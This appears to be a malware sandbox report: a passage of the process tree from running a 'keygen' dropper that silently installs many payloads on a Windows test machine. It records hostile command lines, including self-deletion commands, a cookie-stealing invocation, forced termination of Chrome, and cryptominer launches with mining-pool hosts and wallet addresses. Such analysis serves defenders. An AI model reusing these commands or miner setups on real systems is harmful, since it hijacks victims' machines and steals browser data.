- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
    keygen-step-3.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3912
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3908
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 3000
        5⤵
        Runs ping.exe
        
        PID:4000
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
    keygen-step-4.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3752
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1900
    - - C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:612
      - C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe" 1 3.1617436199.60681e278af5e 101
        6⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4JE59ADPI2\multitimer.exe" 2 3.1617436199.60681e278af5e
        7⤵
        
        PID:4552
        
        C:\Users\Admin\AppData\Local\Temp\nxa4r0urxde\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nxa4r0urxde\cpyrix.exe" /VERYSILENT
        8⤵
        
        PID:2728
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        9⤵
        
        PID:5556
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        10⤵
        
        PID:6000
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        10⤵
        
        PID:5768
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        11⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        9⤵
        
        PID:5452
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        10⤵
        
        PID:16976
        
        C:\Users\Admin\AppData\Local\Temp\e0swwnms2ll\KiffApp1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0swwnms2ll\KiffApp1.exe"
        8⤵
        
        PID:1152
        
        C:\Users\Admin\AppData\Local\Temp\acxjotffzkg\3t0agtg23uq.exe
        
        "C:\Users\Admin\AppData\Local\Temp\acxjotffzkg\3t0agtg23uq.exe" /VERYSILENT
        8⤵
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\is-KMP4S.tmp\3t0agtg23uq.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KMP4S.tmp\3t0agtg23uq.tmp" /SL5="$502F8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\acxjotffzkg\3t0agtg23uq.exe" /VERYSILENT
        9⤵
        
        PID:184
        
        C:\Users\Admin\AppData\Local\Temp\jhgaefyoatl\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhgaefyoatl\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:4072
        
        C:\Users\Admin\AppData\Local\Temp\is-EN7BQ.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EN7BQ.tmp\Setup3310.tmp" /SL5="$502FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\jhgaefyoatl\Setup3310.exe" /Verysilent /subid=577
        9⤵
        
        PID:4560
        
        C:\Users\Admin\AppData\Local\Temp\is-KFR5K.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KFR5K.tmp\Setup.exe" /Verysilent
        10⤵
        
        PID:2640
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"
        11⤵
        
        PID:4324
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:2412
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        12⤵
        
        PID:4452
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:5140
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:5156
        
        C:\Users\Admin\AppData\Local\Temp\is-JOA7P.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JOA7P.tmp\LabPicV3.tmp" /SL5="$30352,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\is-ONCHC.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ONCHC.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\87-59431-9e0-149a2-333cc668c3e4b\Qepinykyhy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\87-59431-9e0-149a2-333cc668c3e4b\Qepinykyhy.exe"
        14⤵
        
        PID:5272
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y11f0kb5.gfn\md6_6ydj.exe & exit
        15⤵
        
        PID:16160
        
        C:\Users\Admin\AppData\Local\Temp\y11f0kb5.gfn\md6_6ydj.exe
        
        C:\Users\Admin\AppData\Local\Temp\y11f0kb5.gfn\md6_6ydj.exe
        16⤵
        
        PID:16808
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkue5hl2.3fh\askinstall31.exe & exit
        15⤵
        
        PID:16128
        
        C:\Users\Admin\AppData\Local\Temp\rkue5hl2.3fh\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\rkue5hl2.3fh\askinstall31.exe
        16⤵
        
        PID:17188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ty3cxjda.ymb\toolspab1.exe & exit
        15⤵
        
        PID:16536
        
        C:\Users\Admin\AppData\Local\Temp\ty3cxjda.ymb\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ty3cxjda.ymb\toolspab1.exe
        16⤵
        
        PID:17276
        
        C:\Users\Admin\AppData\Local\Temp\ty3cxjda.ymb\toolspab1.exe
        
        C:\Users\Admin\AppData\Local\Temp\ty3cxjda.ymb\toolspab1.exe
        17⤵
        
        PID:15772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zpw5wuf5.ifs\setup_10.2_mix.exe & exit
        15⤵
        
        PID:14332
        
        C:\Users\Admin\AppData\Local\Temp\zpw5wuf5.ifs\setup_10.2_mix.exe
        
        C:\Users\Admin\AppData\Local\Temp\zpw5wuf5.ifs\setup_10.2_mix.exe
        16⤵
        
        PID:4228
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h2vfr2m1.a42\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:14416
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dlc2f1jx.ohz\app.exe /8-2222 & exit
        15⤵
        
        PID:14632
        
        C:\Users\Admin\AppData\Local\Temp\dlc2f1jx.ohz\app.exe
        
        C:\Users\Admin\AppData\Local\Temp\dlc2f1jx.ohz\app.exe /8-2222
        16⤵
        
        PID:6492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xekw3gbt.pu1\file.exe & exit
        15⤵
        
        PID:14228
        
        C:\Users\Admin\AppData\Local\Temp\xekw3gbt.pu1\file.exe
        
        C:\Users\Admin\AppData\Local\Temp\xekw3gbt.pu1\file.exe
        16⤵
        
        PID:68
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
        17⤵
        
        PID:8388
        
        C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
        18⤵
        
        PID:12864
        
        C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe" 1 3.1617436508.60681f5cc0631 101
        19⤵
        
        PID:14052
        
        C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4A2YU86AYW\multitimer.exe" 2 3.1617436508.60681f5cc0631
        20⤵
        
        PID:12620
        
        C:\Users\Admin\AppData\Local\Temp\mt5dp3gyjl2\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\mt5dp3gyjl2\app.exe" /8-23
        21⤵
        
        PID:7516
        
        C:\Users\Admin\AppData\Local\Temp\gqcz1d2kokt\yf5vn5pzzbs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gqcz1d2kokt\yf5vn5pzzbs.exe" /ustwo INSTALL
        21⤵
        
        PID:7588
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "yf5vn5pzzbs.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\gqcz1d2kokt\yf5vn5pzzbs.exe" & exit
        22⤵
        
        PID:944
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "yf5vn5pzzbs.exe" /f
        23⤵
        Kills process with taskkill
        
        PID:5500
        
        C:\Users\Admin\AppData\Local\Temp\2epqystrrgy\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2epqystrrgy\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:8196
        
        C:\Users\Admin\AppData\Local\Temp\is-5B0UH.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-5B0UH.tmp\Setup3310.tmp" /SL5="$306D6,138429,56832,C:\Users\Admin\AppData\Local\Temp\2epqystrrgy\Setup3310.exe" /Verysilent /subid=577
        22⤵
        
        PID:17400
        
        C:\Users\Admin\AppData\Local\Temp\is-JBOQM.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JBOQM.tmp\Setup.exe" /Verysilent
        23⤵
        
        PID:8532
        
        C:\Users\Admin\AppData\Local\Temp\brx2ocyrp0o\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\brx2ocyrp0o\cpyrix.exe" /VERYSILENT
        21⤵
        
        PID:8204
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        22⤵
        
        PID:13896
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        23⤵
        
        PID:8584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        23⤵
        
        PID:7508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        24⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        22⤵
        
        PID:13928
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:17384
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        23⤵
        
        PID:5892
        
        C:\Users\Admin\AppData\Local\Temp\bqaahkzthfx\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bqaahkzthfx\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:8436
        
        C:\Users\Admin\AppData\Local\Temp\is-EC023.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-EC023.tmp\vict.tmp" /SL5="$205DC,870426,780800,C:\Users\Admin\AppData\Local\Temp\bqaahkzthfx\vict.exe" /VERYSILENT /id=535
        22⤵
        
        PID:10308
        
        C:\Users\Admin\AppData\Local\Temp\is-JNI7M.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-JNI7M.tmp\win1host.exe" 535
        23⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\IIHJ2KIKWW\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IIHJ2KIKWW\setups.exe" ll
        18⤵
        
        PID:11732
        
        C:\Users\Admin\AppData\Local\Temp\is-9PV60.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9PV60.tmp\setups.tmp" /SL5="$20812,635399,250368,C:\Users\Admin\AppData\Local\Temp\IIHJ2KIKWW\setups.exe" ll
        19⤵
        
        PID:8132
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
        17⤵
        
        PID:11676
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        18⤵
        
        PID:12608
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        19⤵
        Kills process with taskkill
        
        PID:12128
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"
        17⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        18⤵
        
        PID:14324
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        19⤵
        
        PID:15344
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        17⤵
        
        PID:14812
        
        C:\Users\Admin\AppData\Roaming\7E6B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7E6B.tmp.exe"
        18⤵
        
        PID:6644
        
        C:\Users\Admin\AppData\Roaming\7E6B.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\7E6B.tmp.exe"
        19⤵
        
        PID:7232
        
        C:\Users\Admin\AppData\Roaming\B888.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\B888.tmp.exe"
        18⤵
        
        PID:6272
        
        C:\Users\Admin\AppData\Roaming\A02C.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\A02C.tmp.exe"
        18⤵
        
        PID:7396
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        19⤵
        
        PID:4720
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        19⤵
        
        PID:7656
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"
        18⤵
        
        PID:9048
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        19⤵
        Runs ping.exe
        
        PID:4388
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"
        17⤵
        
        PID:14712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1optie0.f03\Four.exe & exit
        15⤵
        
        PID:14972
        
        C:\Users\Admin\AppData\Local\Temp\b1optie0.f03\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\b1optie0.f03\Four.exe
        16⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe" 1 3.1617436491.60681f4c005d7 104
        18⤵
        
        PID:16556
        
        C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Q7KQ3X2GNL\multitimer.exe" 2 3.1617436491.60681f4c005d7
        19⤵
        
        PID:11996
        
        C:\Users\Admin\AppData\Local\Temp\p1fv1mm04pb\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\p1fv1mm04pb\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:15384
        
        C:\Users\Admin\AppData\Local\Temp\is-82DR8.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-82DR8.tmp\vict.tmp" /SL5="$60462,870426,780800,C:\Users\Admin\AppData\Local\Temp\p1fv1mm04pb\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:7692
        
        C:\Users\Admin\AppData\Local\Temp\is-0EE3J.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0EE3J.tmp\win1host.exe" 535
        22⤵
        
        PID:10044
        
        C:\Users\Admin\AppData\Local\Temp\qjsq3tauotl\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qjsq3tauotl\cpyrix.exe" /VERYSILENT
        20⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        21⤵
        
        PID:12396
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        22⤵
        
        PID:12528
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        22⤵
        
        PID:5564
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        23⤵
        
        PID:14480
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        21⤵
        
        PID:13180
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        22⤵
        
        PID:10440
        
        C:\Users\Admin\AppData\Local\Temp\00vuordpxp2\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\00vuordpxp2\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:16264
        
        C:\Users\Admin\AppData\Local\Temp\is-VFA9K.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-VFA9K.tmp\Setup3310.tmp" /SL5="$80500,138429,56832,C:\Users\Admin\AppData\Local\Temp\00vuordpxp2\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7728
        
        C:\Users\Admin\AppData\Local\Temp\is-DOROL.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-DOROL.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:6132
        
        C:\Users\Admin\AppData\Local\Temp\bvbud5dd5of\ajsa0nfvfez.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bvbud5dd5of\ajsa0nfvfez.exe" /ustwo INSTALL
        20⤵
        
        PID:17044
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ajsa0nfvfez.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\bvbud5dd5of\ajsa0nfvfez.exe" & exit
        21⤵
        
        PID:12096
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ajsa0nfvfez.exe" /f
        22⤵
        Kills process with taskkill
        
        PID:952
        
        C:\Users\Admin\AppData\Local\Temp\bxamzy22eoz\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bxamzy22eoz\app.exe" /8-23
        20⤵
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\L1MYAVQ0D8\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\L1MYAVQ0D8\setups.exe" ll
        17⤵
        
        PID:8336
        
        C:\Users\Admin\AppData\Local\Temp\is-DO4S8.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DO4S8.tmp\setups.tmp" /SL5="$207A6,635399,250368,C:\Users\Admin\AppData\Local\Temp\L1MYAVQ0D8\setups.exe" ll
        18⤵
        
        PID:8588
        
        C:\Users\Admin\AppData\Local\Temp\84-d5c9e-e8c-61985-8cdc3dae004f0\Lotedaegaeqi.exe
        
        "C:\Users\Admin\AppData\Local\Temp\84-d5c9e-e8c-61985-8cdc3dae004f0\Lotedaegaeqi.exe"
        14⤵
        
        PID:5724
        
        C:\Program Files\Windows Defender Advanced Threat Protection\GTPMATRWDJ\prolab.exe
        
        "C:\Program Files\Windows Defender Advanced Threat Protection\GTPMATRWDJ\prolab.exe" /VERYSILENT
        14⤵
        
        PID:5296
        
        C:\Users\Admin\AppData\Local\Temp\is-M22CQ.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M22CQ.tmp\prolab.tmp" /SL5="$10420,575243,216576,C:\Program Files\Windows Defender Advanced Threat Protection\GTPMATRWDJ\prolab.exe" /VERYSILENT
        15⤵
        
        PID:3684
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
        11⤵
        
        PID:5204
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:3628
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
        11⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
        12⤵
        
        PID:5488
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        13⤵
        
        PID:5876
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
        11⤵
        
        PID:5256
        
        C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
        
        "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
        11⤵
        
        PID:5292
        
        C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe" 0 306065bb10421b26.04333812 0 103
        12⤵
        
        PID:5264
        
        C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe" 1 3.1617436243.60681e536622d 103
        13⤵
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\O7SKLGHBV9\multitimer.exe" 2 3.1617436243.60681e536622d
        14⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\zull3pxfs33\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\zull3pxfs33\Setup3310.exe" /Verysilent /subid=577
        15⤵
        
        PID:14704
        
        C:\Users\Admin\AppData\Local\Temp\is-9F0D0.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-9F0D0.tmp\Setup3310.tmp" /SL5="$A01FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\zull3pxfs33\Setup3310.exe" /Verysilent /subid=577
        16⤵
        
        PID:15280
        
        C:\Users\Admin\AppData\Local\Temp\is-0GS31.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-0GS31.tmp\Setup.exe" /Verysilent
        17⤵
        
        PID:17004
        
        C:\Users\Admin\AppData\Local\Temp\z2kbg45oibs\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z2kbg45oibs\app.exe" /8-23
        15⤵
        
        PID:14688
        
        C:\Users\Admin\AppData\Local\Temp\z2kbg45oibs\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\z2kbg45oibs\app.exe" /8-23
        16⤵
        
        PID:9912
        
        C:\Users\Admin\AppData\Local\Temp\lfbmpxs2piq\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\lfbmpxs2piq\vict.exe" /VERYSILENT /id=535
        15⤵
        
        PID:14900
        
        C:\Users\Admin\AppData\Local\Temp\is-I2ULR.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I2ULR.tmp\vict.tmp" /SL5="$402AC,870426,780800,C:\Users\Admin\AppData\Local\Temp\lfbmpxs2piq\vict.exe" /VERYSILENT /id=535
        16⤵
        
        PID:15460
        
        C:\Users\Admin\AppData\Local\Temp\is-ATTSH.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-ATTSH.tmp\win1host.exe" 535
        17⤵
        
        PID:16172
        
        C:\Users\Admin\AppData\Local\Temp\nsh4k3wypkf\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsh4k3wypkf\cpyrix.exe" /VERYSILENT
        15⤵
        
        PID:14936
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        16⤵
        
        PID:16316
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        17⤵
        
        PID:16748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        17⤵
        
        PID:17200
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        18⤵
        
        PID:16360
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        16⤵
        
        PID:16440
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        "{path}"
        17⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\w40wz2osb2j\pzzo2o2bnja.exe
        
        "C:\Users\Admin\AppData\Local\Temp\w40wz2osb2j\pzzo2o2bnja.exe" /ustwo INSTALL
        15⤵
        
        PID:15028
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "pzzo2o2bnja.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\w40wz2osb2j\pzzo2o2bnja.exe" & exit
        16⤵
        
        PID:16712
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "pzzo2o2bnja.exe" /f
        17⤵
        Kills process with taskkill
        
        PID:15952
        
        C:\Users\Admin\AppData\Local\Temp\sp2acmbodpn\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sp2acmbodpn\vpn.exe" /silent /subid=482
        15⤵
        
        PID:15544
        
        C:\Users\Admin\AppData\Local\Temp\is-HRQPU.tmp\vpn.tmp
        
